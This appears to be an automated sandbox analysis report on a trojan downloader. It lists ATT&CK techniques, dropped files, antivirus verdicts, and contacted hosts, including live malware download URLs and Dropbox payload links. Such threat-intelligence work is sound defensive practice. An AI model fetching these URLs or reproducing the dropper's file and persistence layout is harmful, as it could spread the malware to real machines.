                              Source: Yara matchFile source: Dzsb.Qyd.Install.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.Dzsb.Qyd.Install.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1274914579.0000000000694000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Dzsb.Qyd.Install.exe PID: 7060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 3588, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE0B2.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information41
                              Scripting
                              1
                              Replication Through Removable Media
                              Windows Management Instrumentation41
                              Scripting
                              11
                              Process Injection
                              11
                              Masquerading
                              OS Credential Dumping111
                              Security Software Discovery
                              Remote ServicesData from Local System1
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              Registry Run Keys / Startup Folder
                              1
                              Registry Run Keys / Startup Folder
                              11
                              Virtualization/Sandbox Evasion
                              LSASS Memory1
                              Process Discovery
                              Remote Desktop ProtocolData from Removable Media3
                              Ingress Tool Transfer
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Process Injection
                              Security Account Manager11
                              Virtualization/Sandbox Evasion
                              SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                              Extra Window Memory Injection
                              1
                              Rundll32
                              NTDS1
                              Peripheral Device Discovery
                              Distributed Component Object ModelInput Capture34
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading
                              LSA Secrets3
                              File and Directory Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              Extra Window Memory Injection
                              Cached Domain Credentials12
                              System Information Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556405 Sample: Dzsb.Qyd.Install.exe Startdate: 15/11/2024 Architecture: WINDOWS Score: 100 43 freedns.afraid.org 2->43 45 xred.mooo.com 2->45 47 4 other IPs or domains 2->47 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Antivirus detection for URL or domain 2->63 67 12 other signatures 2->67 8 Dzsb.Qyd.Install.exe 1 6 2->8         started        11 Synaptics.exe 47 2->11         started        14 EXCEL.EXE 175 57 2->14         started        16 2 other processes 2->16 signatures3 65 Uses dynamic DNS services 43->65 process4 dnsIp5 33 C:\Users\...\._cache_Dzsb.Qyd.Install.exe, PE32 8->33 dropped 35 C:\ProgramData\Synaptics\Synaptics.exe, PE32 8->35 dropped 37 C:\ProgramData\Synaptics\RCXE0B2.tmp, PE32 8->37 dropped 39 C:\...\Synaptics.exe:Zone.Identifier, ASCII 8->39 dropped 18 Synaptics.exe 38 8->18         started        23 ._cache_Dzsb.Qyd.Install.exe 2 8->23         started        55 142.250.185.78, 443, 49768, 49769 GOOGLEUS United States 11->55 41 C:\Users\user\Documents\~$cache1, PE32 11->41 dropped 25 WerFault.exe 11->25         started        57 s-part-0017.t-0009.t-msedge.net 13.107.246.45, 443, 49781, 49816 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 14->57 27 splwow64.exe 14->27         started        file6 process7 dnsIp8 49 drive.usercontent.google.com 142.250.185.65, 443, 49713, 49715 GOOGLEUS United States 18->49 51 docs.google.com 142.250.186.78, 443, 49708, 49709 GOOGLEUS United States 18->51 53 freedns.afraid.org 69.42.215.252, 49711, 49771, 80 AWKNET-LLCUS United States 18->53 31 C:\Users\user\Documents\DUUDTUBZFW\~$cache1, PE32 18->31 dropped 69 Antivirus detection for dropped file 18->69 71 Drops PE files to the document folder of the user 18->71 73 Machine Learning detection for dropped file 18->73 29 WerFault.exe 22 16 18->29         started        file9 signatures10 process11

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              Dzsb.Qyd.Install.exe100%AviraTR/Dldr.Agent.SH
                              Dzsb.Qyd.Install.exe100%AviraW2000M/Dldr.Agent.17651006
                              Dzsb.Qyd.Install.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\RCXE0B2.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCXE0B2.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCXE0B2.tmp100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\Users\user\Documents\DUUDTUBZFW\~$cache1100%Joe Sandbox ML
                              C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCXE0B2.tmp88%ReversingLabsWin32.Virus.Napwhich
                              C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe5%ReversingLabs
                              C:\Users\user\Documents\DUUDTUBZFW\~$cache188%ReversingLabsWin32.Virus.Napwhich
                              C:\Users\user\Documents\~$cache188%ReversingLabsWin32.Virus.Napwhich
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://xred.site50.net/syn/Synaptics.rarZ100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SUpdate.iniZ100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/Synaptics.rarX100%Avira URL Cloudmalware
                              http://ocsp3.sheca.com/ShecaG2-1/shecaG2-1.ocsp050%Avira URL Cloudsafe
                              https://docs.goo0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SSLLibrary.dl4100%Avira URL Cloudmalware
                              http://xred.site50.net/syn/SSLLibrary.dll6100%Avira URL Cloudmalware
                              http://www.sheca.com/policy/00%Avira URL Cloudsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              69.42.215.252
                              truefalse
                                high
                                docs.google.com
                                142.250.186.78
                                truefalse
                                  high
                                  s-part-0017.t-0009.t-msedge.net
                                  13.107.246.45
                                  truefalse
                                    high
                                    drive.usercontent.google.com
                                    142.250.185.65
                                    truefalse
                                      high
                                      xred.mooo.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.google.com/ogleviDSynaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1~$cache1.20.drfalse
                                                  high
                                                  http://xred.site50.net/syn/Synaptics.rarXDzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://docs.google.com/blecliSynaptics.exe, 00000014.00000003.1976684823.0000000004C8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978hDzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ldap2.sheca.com/root/shecaG2-1.der0Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drfalse
                                                        high
                                                        https://docs.google.com/24Synaptics.exe, 00000014.00000003.1976684823.0000000004CC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978eSynaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935866964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.usercontent.google.com/Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://upx.sf.netAmcache.hve.13.drfalse
                                                                  high
                                                                  http://xred.site50.net/syn/Synaptics.rar~$cache1.20.drfalse
                                                                    high
                                                                    https://docs.google.com/s-cn.cSynaptics.exe, 00000014.00000003.1976684823.0000000004C8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://docs.google.com/e.cnSynaptics.exe, 00000014.00000003.1976684823.0000000004C8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://docs.google.com/X5Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://docs.google.com/Synaptics.exe, 00000003.00000002.1441338159.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1316708703.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007224000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007E78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://drive.usercontent.google.com/dowSynaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1~$cache1.20.drfalse
                                                                                  high
                                                                                  https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~$cache1.20.drfalse
                                                                                    high
                                                                                    https://drive.usercontent.google.com/lesaSynaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://xred.site50.net/syn/SUpdate.ini~$cache1.20.drfalse
                                                                                        high
                                                                                        https://docs.gooSynaptics.exe, 00000014.00000003.2017353207.0000000007F64000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlHDzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://xred.site50.net/syn/SSLLibrary.dl4Dzsb.Qyd.Install.exe, 00000000.00000003.1252118782.0000000002320000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://www.sheca.com/policy/0Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://drive.usercontent.google.com/mpprSynaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://ldap2.sheca.com/CA13/RA12050100/CRL4903.crl0Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drfalse
                                                                                                high
                                                                                                https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.1450628098.000000000B2FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2147396926.0000000008B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2155513902.0000000011C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2149007672.000000000B1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2150643930.000000000D8BE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935866964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://docs.google.com/ESynaptics.exe, 00000003.00000002.1445445710.0000000007224000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://xred.site50.net/syn/SSLLibrary.dll~$cache1.20.drfalse
                                                                                                        high
                                                                                                        https://docs.google.com/danciSynaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://drive.usercontent.google.com/6Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://ocsp3.sheca.com/ShecaG2-1/shecaG2-1.ocsp05Dzsb.Qyd.Install.exe, Synaptics.exe.0.dr, ._cache_Dzsb.Qyd.Install.exe.0.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            142.250.186.78
                                                                                                            docs.google.comUnited States
                                                                                                            15169GOOGLEUSfalse
                                                                                                            142.250.185.78
                                                                                                            unknownUnited States
                                                                                                            15169GOOGLEUSfalse
                                                                                                            13.107.246.45
                                                                                                            s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                            69.42.215.252
                                                                                                            freedns.afraid.orgUnited States
                                                                                                            17048AWKNET-LLCUSfalse
                                                                                                            142.250.185.65
                                                                                                            drive.usercontent.google.comUnited States
                                                                                                            15169GOOGLEUSfalse
                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1556405
                                                                                                            Start date and time:2024-11-15 11:22:59 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 5m 59s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:29
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:Dzsb.Qyd.Install.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.expl.winEXE@13/54@12/5
                                                                                                            EGA Information:Failed
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 0
                                                                                                            • Number of non-executed functions: 0
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.109.32.97, 52.113.194.132, 104.208.16.89, 20.42.65.92, 104.208.16.95, 52.168.117.173
                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdcus20.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, onedscolprdcus11.centralus.cloudapp.azure.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ukw-azsc-config.officeapps.live.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1
                                                                                                            • Execution Graph export aborted for target Synaptics.exe, PID 6056 because there are no executed function
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                            • VT rate limit hit for: Dzsb.Qyd.Install.exe
                                                                                                            TimeTypeDescription
                                                                                                            05:23:34API Interceptor304x Sleep call for process: Synaptics.exe modified
                                                                                                            05:23:50API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                            05:25:32API Interceptor51x Sleep call for process: splwow64.exe modified
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • nam.dcv.ms/BxPVLH2cz4
                                                                                                            69.42.215.252Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            P4.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            lFsYXvJPWw.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            9l5kmTp94R.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            TBIG.exeGet hashmaliciousAveMaria, UACMe, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            1RGKUwuqi0.exeGet hashmaliciousRemcos, PureLog Stealer, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://tractopieces35-my.sharepoint.com/:o:/g/personal/lecomte22_tracto-pieces_fr/EqM9FMd6batFtzMgdv1f2XUBmLAJecWys730N_AOVrXnXA?e=3TLKO8Get hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            704b67b5-6bc9-dbd5-0710-60eb98e03983.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 13.107.246.45
                                                                                                            YU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 13.107.246.45
                                                                                                            seRpOAk8gH.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 13.107.246.45
                                                                                                            1n72lp2XjT.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://www.google.dk/url?sa=https://abc123xyz456def789ghj101klm112nop345qrs678tuv901wxyz234abc567d&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiX6tO39MiJAxUSnP0HHcggDNwQFnoECBoQAQ&url=amp%2F%62%68%61%72%61%74%68%73%65%72%76%69%63%65%73%69%6E%64%69%61%2E%63%6F%6D%2F%75%6E%73%75%62%73%63%72%69%62%65%2Fab86aa851e981834b77805f77a6cca34%2Fcm9yeWdvd2VyQHF1YW50ZXhhLmNvbQ==&token=fgj784jkh23&referrerID=xyz456789&sessionKey=abc123456789&trackingID=klmn987654&clickID=7890abcd1234&userID=xyz901234&pageID=web23456789Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://www.cognitoforms.com/f/QJDkMg1ACkylvn0c20THNA/1Get hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                            • 13.107.246.45
                                                                                                            freedns.afraid.orgBank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            System Volume Information.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            P4.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                                                                            • 69.42.215.252
                                                                                                            lFsYXvJPWw.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            9l5kmTp94R.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            TBIG.exeGet hashmaliciousAveMaria, UACMe, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            1RGKUwuqi0.exeGet hashmaliciousRemcos, PureLog Stealer, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://tractopieces35-my.sharepoint.com/:o:/g/personal/lecomte22_tracto-pieces_fr/EqM9FMd6batFtzMgdv1f2XUBmLAJecWys730N_AOVrXnXA?e=3TLKO8Get hashmaliciousUnknownBrowse
                                                                                                            • 52.108.11.12
                                                                                                            704b67b5-6bc9-dbd5-0710-60eb98e03983.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 52.109.28.46
                                                                                                            ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 72.145.3.21
                                                                                                            Email_sending_restriction_[sebastien.morel!](#HOHSM).htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 52.98.227.242
                                                                                                            ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 72.145.3.21
